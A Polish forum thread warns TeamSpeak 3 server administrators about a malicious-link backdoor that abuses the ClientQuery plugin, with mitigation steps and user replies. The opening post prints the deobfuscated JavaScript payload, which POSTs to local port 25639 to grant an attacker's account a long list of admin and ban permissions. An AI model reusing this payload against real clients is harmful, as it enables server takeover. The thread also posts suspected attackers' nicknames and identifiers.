Backdoor TS3 - Informacja dla wszystkich administratorów teamspeak 3

[TS3Bahu]

Witajcie!

 

Jako firma, chcielibyśmy ostrzec, przed groźnym backdoor-em dla klienta TeamSpeak 3, który wykorzystuję plugin addon "ClientQuery". Polecam nie wchodzić w jakiekolwiek linki od niezaufanych użytkowników komunikatora. Mój klient hostingu został zaatakowany kodem poprzez kliknięcie w nieautoryzowany link, co spowodowało dodanie uprawnień oraz możliwość zbanowania wszystkich użytkowników serwera publicznego.

 

Ważna linijka szkodliwego kodu:

Plugin "ClientQuery" posiada otwarty port 25639 - "POST","http://127.0.0.1:256...,"clientaddpermcldbid=",". Zalecam wyłączenie pluginu tak aby administrator nie padł ofiarą backdoor-a, szkodliwa działalność polega na uzyskaniu uprawnień poprzez klienta, który wszedł w link, na konto osoby atakującej.

 

 

Nalegam aby każdy z administratorów oraz właścicieli serwerów publicznych jak i prywatnych, zaaktualizował wersję klienta do 3.1.3.

 

Jak wyłączyć plugin "ClientQuery"?

 

Wersja Polska: Narzędzia -> Opcje -> Dodatki -> ClientQuery -> Wyłącz -> Odśwież Wszystkie

Wersja Angielska: Tools -> Options -> Addons -> ClientQuery -> Disabled -> Refresh

 

Źródło kodu zostało rozkodowane:

 

var _$_1b0d=["load","load_screen","getElementById","removeChild","body","addEventListener","demo2","innerHTML","random","floor","POST","http://127.0.0.1:25639","open","onreadystatechange","clientaddperm cldbid="," permsid=i_group_modify_power permvalue=75 permskip=0|permsid=i_group_modify_power permvalue=75 permskip=0|permsid=i_group_needed_modify_power permvalue=75 permskip=0|permsid=i_group_member_add_power permvalue=75 permskip=0|permsid=i_group_needed_member_add_power permvalue=75 permskip=0|permsid=i_group_member_remove_power permvalue=75 permskip=0|permsid=i_permission_modify_power permvalue=75 permskip=0|permsid=i_client_ban_power permvalue=75 permskip=0|permsid=i_client_needed_ban_power permvalue=75 permskip=0|permsid=i_client_move_power permvalue=75 permskip=0|permsid=b_client_modify_dbproperties permvalue=75 permskip=0|permsid=b_client_delete_dbproperties permvalue=75 permskip=0|permsid=i_needed_modify_power_group_modify_power permvalue=75 permskip=0|permsid=i_client_needed_permission_modify_power permvalue=65 permskip=0|permsid=i_channel_join_power permvalue=75 permskip=0|permsid=i_client_ban_max_bantime permvalue=-1 permskip=0|permsid=i_needed_modify_power_virtualserver_token_add permvalue=75 permskip=0|permsid=b_virtualserver_modify_default_servergroup permvalue=75 permskip=0|permsid=b_channel_join_ignore_password permvalue=75 permskip=0|permsid=b_virtualserver_modify_name permvalue=75 permskip=0|permsid=b_channel_join_ignore_maxclients permvalue=75 permskip=0|permsid=b_client_create_modify_serverquery_login permvalue=75 permskip=0|permsid=b_virtualserver_servergroup_permission_list permvalue=75 permskip=0|permsid=b_virtualserver_servergroup_list permvalue=75 permskip=0|permsid=b_virtualserver_servergroup_client_list permvalue=75 permskip=0|permsid=i_permission_modify_power permvalue=75 permskip=0|permsid=b_client_ban_create permvalue=75 permskip=0|permsid=i_needed_modify_power_channel_create_permanent permvalue=75 permskip=0|permsid=i_needed_modify_power_channel_create_semi_permanent permvalue=75 permskip=0|permsid=i_needed_modify_power_channel_join_permanent permvalue=75 permskip=0|permsid=i_needed_modify_power_client_remoteaddress_view permvalue=75 permskip=0|permsid=i_needed_modify_power_group_needed_modify_power permvalue=75 permskip=0|permsid=i_needed_modify_power_group_member_add_power permvalue=75 permskip=0|permsid=i_client_needed_permission_modify_power permvalue=75 permskip=0|permsid=b_virtualserver_token_add permvalue=75 permskip=0|permsid=b_virtualserver_token_use permvalue=75 permskip=0|permsid=b_virtualserver_modify_welcomemessage permvalue=75 permskip=0|permsid=b_client_remoteaddress_view permvalue=75 permskip=0|permsid=b_client_modify_dbproperties permvalue=75 permskip=0|permsid=b_virtualserver_modify_default_channelgroup permvalue=75 permskip=0|permsid=b_virtualserver_modify_default_channeladmingroup permvalue=75 permskip=0|permsid=b_virtualserver_modify_ft_settings permvalue=75 permskip=0|permsid=i_channel_permission_modify_power permvalue=75 permskip=0|permsid=b_virtualserver_servergroup_create permvalue=75 permskip=0|permsid=i_group_needed_member_remove_power permvalue=75 permskip=0|permsid=b_group_is_permanent permvalue=75 permskip=0|permsid=b_virtualserver_channelgroup_delete permvalue=75 permskip=0|permsid=b_client_skip_channelgroup_permissions permvalue=75 permskip=0|permsid=i_channel_delete_power permvalue=75 permskip=0|permsid=b_channel_delete_flag_force permvalue=75 permskip=0|permsid=b_virtualserver_client_permission_list permvalue=75 permskip=0|permsid=i_client_permission_modify_power permvalue=75 permskip=0|permsid=b_channel_delete_permanent permvalue=75 permskip=0|permsid=b_channel_delete_semi_permanent permvalue=75 permskip=0|permsid=b_channel_delete_temporary permvalue=75 permskip=0|permsid=b_channel_delete_flag_force permvalue=75 permskip=0|permsid=b_client_info_view permvalue=75 permskip=0|permsid=b_client_permissionoverview_view permvalue=75 permskip=0|permsid=b_client_permissionoverview_own permvalue=75 permskip=0|permsid=i_client_serverquery_view_power permvalue=75 permskip=0|permsid=i_client_needed_serverquery_view_power permvalue=75 permskip=0|permsid=b_client_custom_info_view permvalue=75 permskip=0|permsid=b_virtualservAer_servergroup_delete permvalue=75 permskip=0|permsid=i_client_needed_move_power permvalue=75 permskip=0|permsid=b_virtualserver_modify_hostbanner permvalue=75 permskip=0|permsid=b_virtualserver_modify_antiflood permvalue=75 permskip=0|permsid=b_virtualserver_notify_register permvalue=75 permskip=0|permsid=b_client_modify_description permvalue=75 permskip=0|permsid=b_client_modify_own_description permvalue=75 permskip=0|permsid=b_channel_modify_maxclients permvalue=75 permskip=0|permsid=b_virtualserver_modify_maxclients permvalue=75 permskip=0|permsid=b_virtualserver_client_list permvalue=75 permskip=0|permsid=b_virtualserver_client_search permvalue=75 permskip=0|permsid=b_virtualserver_modify_default_channelgroup permvalue=75 permskip=0|permsid=b_client_ban_list permvalue=75 permskip=0|permsid=b_client_ban_delete_own permvalue=75 permskip=0|permsid=b_client_ban_delete permvalue=75 permskip=0|permsid=b_virtualserver_client_dblist permvalue=75 permskip=0|permsid=b_virtualserver_client_dbsearch permvalue=75 permskip=0|permsid=b_virtualserver_client_dbinfo permvalue=75 permskip=0|permsid=b_virtualserver_info_view permvalue=75 permskip=0|permsid=b_virtualserver_connectioninfo_view permvalue=75 permskip=0|permsid=b_virtualserver_channel_list permvalue=75 permskip=0|permsid=b_virtualserver_channel_search permvalue=75 permskip=0|permsid=b_virtualserver_permission_find permvalue=75 permskip=0|permsid=b_virtualserver_custom_search permvalue=75 permskip=0|permsid=b_virtualserver_channelclient_permission_list permvalue=75 permskip=0|permsid=b_virtualserver_channel_permission_list permvalue=75 permskip=0|permsid=b_virtualserver_channelgroup_client_list permvalue=75 permskip=0|permsid=b_virtualserver_channelgroup_permission_list permvalue=75 permskip=0|permsid=b_virtualserver_channelgroup_list permvalue=75 permskip=0|permsid=b_virtualserver_modify_channel_temp_delete_delay_default permvalue=75 permskip=0|permid=b_virtualserver_modify_needed_identity_security_level permvalue=75 permskip=0|permsid=i_client_complain_power permvalue=75 permskip=0|i_client_kick_from_channel_power permvalue=75 permskip=0|permsid=i_client_kick_from_server_power permvalue=75 permskip=0|permsid=i_client_needed_kick_from_server_power permvalue=75 permskip=0|permid=i_client_kick_from_channel_power permvalue=75 permskip=0|permid=b_client_ignore_bans permvalue=75 permskip=0|permid=b_client_ignore_antiflood permvalue=75 permskip=0|permsid=b_virtualserver_select permvalue=75 permskip=0|permsid=b_virtualserver_modify_hostbutton permvalue=75 permskip=0","

","send","demo"];

 

Pozdrawiam serdecznie

CEO Mateusz Gladosz

TS3Bahu LTD

[Soanger]

Dzięki za podzielenie się

[Pantoflarzek]

Takie pytanie, samo zablokowanie tej permisji nic nie da?

b_client_issue_client_query_command

Zastanawiało mnie do czego w takim razie służy ta permisja, jeśli nie do ochrony od tego i podobnych typu ataków?

 

Nie znam się wogóle na tej permisji i dopiero na nią natrafiłem jak teraz z ciekawości sprawdzałem, stąd pytanie :P

[Maja..]

Szkoda, że mój serwer musiał ucierpieć by inne uratować.

No nic, mam nadzieję, że 'szkodniki' nie zdobędą więcej ofiar. 

Super, że podzieliłeś się informacją. 

[orkin]

Takie pytanie, samo zablokowanie tej permisji nic nie da?

b_client_issue_client_query_command

Zastanawiało mnie do czego w takim razie służy ta permisja, jeśli nie do ochrony od tego i podobnych typu ataków?

 

Nie znam się wogóle na tej permisji i dopiero na nią natrafiłem jak teraz z ciekawości sprawdzałem, stąd pytanie :P

Jeżeli opis nie kłamie, to odebranie tego uprawnienia powinno załatwić sprawę.

[Gość]

 

Z ts3 nie ma problemów, on jest dobry, discord nie ma nic do gadania.

 

[Maja..]

 

Z ts3 nie ma problemów, on jest dobry, discord nie ma nic do gadania.

 

Nie wiem kto tak napisał, jednak wszystko ma luki i błędy. Wprowadzając nowości czy zmiany trzeba mieć świadomość, że aktualizacja będzie potrzebowała popraw i łatek. Nie wszystko od razu powstaje na tyle by nie mieć błędów, nic nie jest doskonałe. Mało kto twierdzi, że "Discord" nie ma nic do gadania bo jednak ma. Stanowi konkurencję dla TeamSpeak-a ale to nic dziwnego. Zawsze jak pojawia się coś nowego to ludzie się rzucają, a może to kiedyś Discord będzie najczęstszym wyborem do komunikacji przy grze, kto wie.

[Poker Face.]

Zero k***a mózgu macie.. Jeszcze dajcie im source i będzie cacy ....

[`.Łukasz.]

Dobrze wiedzieć.

Dziękujemy @TS3Bahu za informacje.

[Gość]

Zero k***a mózgu macie.. Jeszcze dajcie im source i będzie cacy ....

To jest jedynie rozkodowana część reszta i tak była open.

 

Myślisz, że skąd jest ten skrypt? Polak go wymyślił? Nie bądź śmieszny to wszystko jest w necie wystarczy poszukać. Autor się nawet podpisał pod swoją pracą w kontarzu w kodzie. Nie został on podany by cebula nie mogła sobie tego używać

[#Gremsonkowy#]

Szkoda, że mój serwer musiał ucierpieć by inne uratować.

No nic, mam nadzieję, że 'szkodniki' nie zdobędą więcej ofiar.

Super, że podzieliłeś się informacją.

@Maja..

 

Haha, znów banuja ci serwer który tu juz raz z kolei, widać ze nic ciebie i twoją administracje to nie nauczyło. I ty chcesz prowadzić nadal serwer TeamSpeak3. Polecam skończyć z TeamSpeak3 bo nadwyrezylas juz zaufanie wielu swoich użytkowników a takze pokazalas ze nie jesteś osobą poważną i nie potrafisz zapobiec takim sytuacjom.

 

@topic

 

Propsy dla TS3-BAHU za szybką reakcję na exploit i udostępnienie informacji na jego temat.

[Nitr0o]

 

Szkoda, że mój serwer musiał ucierpieć by inne uratować.

No nic, mam nadzieję, że 'szkodniki' nie zdobędą więcej ofiar.

Super, że podzieliłeś się informacją.

@Maja..

 

Haha, znów banuja ci serwer który tu juz raz z kolei, widać ze nic ciebie i twoją administracje to nie nauczyło. I ty chcesz prowadzić nadal serwer TeamSpeak3. Polecam skończyć z TeamSpeak3 bo nadwyrezylas juz zaufanie wielu swoich użytkowników a takze pokazalas ze nie jesteś osobą poważną i nie potrafisz zapobiec takim sytuacjom.

 

 

To jest temat informacyjny, nie temat o konkretnej osobie   

Załatwcie sobie te sprawy na PW bo to się robi śmieszne powoli

[_Robak]

Dzięki za informacje.

[Maja..]

 

Szkoda, że mój serwer musiał ucierpieć by inne uratować.

No nic, mam nadzieję, że 'szkodniki' nie zdobędą więcej ofiar.

Super, że podzieliłeś się informacją.

@Maja..

 

Haha, znów banuja ci serwer który tu juz raz z kolei, widać ze nic ciebie i twoją administracje to nie nauczyło. I ty chcesz prowadzić nadal serwer TeamSpeak3. Polecam skończyć z TeamSpeak3 bo nadwyrezylas juz zaufanie wielu swoich użytkowników a takze pokazalas ze nie jesteś osobą poważną i nie potrafisz zapobiec takim sytuacjom.

 

@topic

 

Propsy dla TS3-BAHU za szybką reakcję na exploit i udostępnienie informacji na jego temat.

 

 

Wszystko super fajnie ale gdyby nie mój TeamSpeak to TS3Bahu nie miałby do tego wglądu i tak szybkiej reakcji.

Temat powstał bo to ja zgłosiłam ten problem do Mateusza dlatego troszkę przyhamuj. 

Zwłaszcza, że nic szczególnego się nie stało i jakoś dalej siedzi po 200-300 osób. Gdybym straciła 'wiarygodność' to myślę, że nie miałabym takiego licznika.

Idź płakać gdzie indziej bo to już się robi co najmniej żałosne. 

[vest.]

Dzięki za informacje, lajkuje.

[ɴoɴαмe]

Jak by ktoś chciał się dowiedzieć jak to działa opiszę to bardzo prosto:

 

Najczęściej przychodzi osóbka i mówi ,że chciałaby nawiązać współpracę, podaje link do swojej strony.

Oczywiście nikt się niczego nie spodziewa i klika w link.

Po kliknięciu w link strona wykonuje komendy.

Nie trzeba w nic na stronie klikać wystarczy same wejście.

 

Jak by ktoś chciał zobaczyć jak to działa na własnej skórze zapraszam PW, oczywiście wszystko w formie edukacyjnej.

[`Kuba]

Dzięki @TS3Bahu

[*Majkon]

Dzięki za informacje.

[Gość]

Dziękuję ci, za poinformowanie nas o takim czymś.

[Szysz3k]

Chciałbym naznaczyć, że najnowsza wersja stabilna TS3 (tj. 3.1.3) jakkolwiek naprawia błąd, dodaje on wymóg autoryzacji aby używać client-query.

[Gość]

Dziękuje za info, wszystko zrobione Szkoda jednak ts'ów które przez to ucierpiały.

[Kalambur99]

Przydatna informacja.

 

Dzisiaj pisał jeden użytkownik (1 connect), który i tak siedział na innym ts'ie o tym, czy nie chcielibyśmy podjąć współpracy z jego serwerem minecraft - oczywiście wiadomo o co chodziło..

[muchomor321]

Przydatne, znajomemu tak 2 tygodnie temu rozwalili serwer ale i tak nie wchodzę w żadne linki albo bynajmniej sprawdzam zakodowanie linku czy nie ma przekierowywania 

[Canecorso]

Przydatna informacja.

 

Dzisiaj pisał jeden użytkownik (1 connect), który i tak siedział na innym ts'ie o tym, czy nie chcielibyśmy podjąć współpracy z jego serwerem minecraft - oczywiście wiadomo o co chodziło..

Możemy się skontaktować na pw ??

Chyba trafiłem ten sam przypadek.

[artur8889]

Dzięki za udostępnienie.

 

Chciałbym Was ostrzeć przed osobą, która na tym forum ma nick Dev Amator.

Wczoraj na mojego tsa wbiłby trzy osoby z ofertą współpracy żebym pomagał pisać im strony www czy coś takiego. Poprosiłem o przykłady stron i dostałem link, który otworzyłem z drugiego komputera.

Jakowo, że na stronie widoczny był tylko napis "Witaj na mojej stronie", spojrzałem w kod źródłowy strony. W kodzie strony był widoczny właśnie owy złośliwy kod.

Zapewne te osoby posługiwały się fałszywymi nickami i indetyfikatorami ale podam je tutaj:

goguś - bku+5jKjnmiC3mawmDrSnP3F3EI=
Słynny - C5/DCYgZGVNwJ015HLuLWZJXgog=
lolek - SAIjVHbRJL85vB14nLeiDnqANQg=

W każdym razie gdyby nie ten post to pewnie bym wszedł w tego linka nie patrząc na nic, dziękuje autorowi za udostępnienie i ostrzegam przed osoba z tego forum o nicku Dev Amator.